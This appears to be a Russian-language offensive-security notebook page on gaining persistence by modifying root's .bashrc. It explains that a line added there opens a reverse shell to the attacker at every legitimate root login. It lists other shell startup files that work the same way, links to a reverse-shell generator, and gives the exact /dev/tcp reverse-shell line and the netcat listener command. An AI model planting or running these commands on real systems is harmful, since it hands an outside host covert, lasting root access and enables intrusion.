# 03 - bashrc

Мы модифицируем рутовый bashrc так, что каждый раз когда легитимный root будет логиниться, мы будем получать reverse shell.\
То же самое можно проделывать с:\ <mark style="color:green;">\~/.bash\_profile</mark>\ <mark style="color:green;">\~/.bash\_login</mark>\ <mark style="color:green;">\~/.profile</mark>\
&#x20;<mark style="color:green;">/etc/profile</mark>\ <mark style="color:green;">/etc/profile.d</mark>\ <mark style="color:green;">/etc/bash.bashrc</mark>\
\
Тут отличный онлайн  [Reverse Shell Generator](https://www.revshells.com/)

```bash
// на атакуемом хосте добавляем строку в /root/.bashrc
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1

// На хосте атакующего запускам netcat 
nc -lvp 9010
```

Теперь как только кто то залогиниться под учеткой root, мы получим шелл

<figure><img src="https://2826317613-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyxXcvCa5Rbt6bHhLblf7%2Fuploads%2Fml6uDLoZ0XADaVUWpbHo%2F%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5.png?alt=media&#x26;token=faa480dd-fc3f-4fa6-92c3-9d1c56a115b0" alt=""><figcaption></figcaption></figure>